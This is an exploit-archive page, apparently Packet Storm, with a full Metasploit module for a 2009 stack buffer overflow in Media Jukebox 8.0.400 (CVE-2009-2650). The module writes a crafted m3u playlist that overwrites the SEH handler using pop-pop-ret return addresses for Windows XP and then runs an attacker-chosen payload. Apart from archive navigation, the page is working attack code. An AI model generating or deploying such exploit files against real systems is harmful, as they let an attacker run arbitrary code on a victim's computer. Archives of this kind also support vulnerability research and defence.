Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)

Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH): Posted Dec 31, 2009; Authored by Ron Henry, dijital1 | Site metasploit.com; This Metasploit module exploits a stack overflow in Media Jukebox 8.0.400. By creating a specially crafted m3u or pls file, an attacker may be able to execute arbitrary code.; tags | exploit, overflow, arbitrary; advisories | CVE-2009-2650; SHA-256 | fef83dcc625d462c8b805f2c638c713780ca2eb54695b17cff8d6771f57a07b6; Download | Favorite | View

Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
      'Description' => %q{
        This module exploits a stack overflow in Media Jukebox 8.0.400
      By creating a specially crafted m3u or pls file, an an attacker may be able
      to execute arbitrary code.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Ron Henry <rlh[at]ciphermonk.net>',
          'dijital1',
        ],
      'Version' => '$Revision: 8038 $',
      'References' =>
        [
          [ 'OSVDB', '55924' ],
          [ 'CVE', '2009-2650']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload' =>
        {
          'Space' => 3000,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ],     # 0x02951457 pop, pop, ret dsp_mjMain.dll
          [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ],     # 0x02291457 pop, pop, ret dsp_mjMain.dll
        ],
      'Privileged' => false,
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),
      ], self.class)
  end


  def exploit
    sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
    sploit << rand_text_alphanumeric(262)
    sploit << generate_seh_payload(target.ret)
    sploit << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end

end

Top Authors In Last 30 Days

Red Hat 253 files
Ubuntu 83 files
Gentoo 29 files
indoushka 26 files
Debian 10 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
Google Security Research 2 files
S. Dietz 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)

Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)

Share This

Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems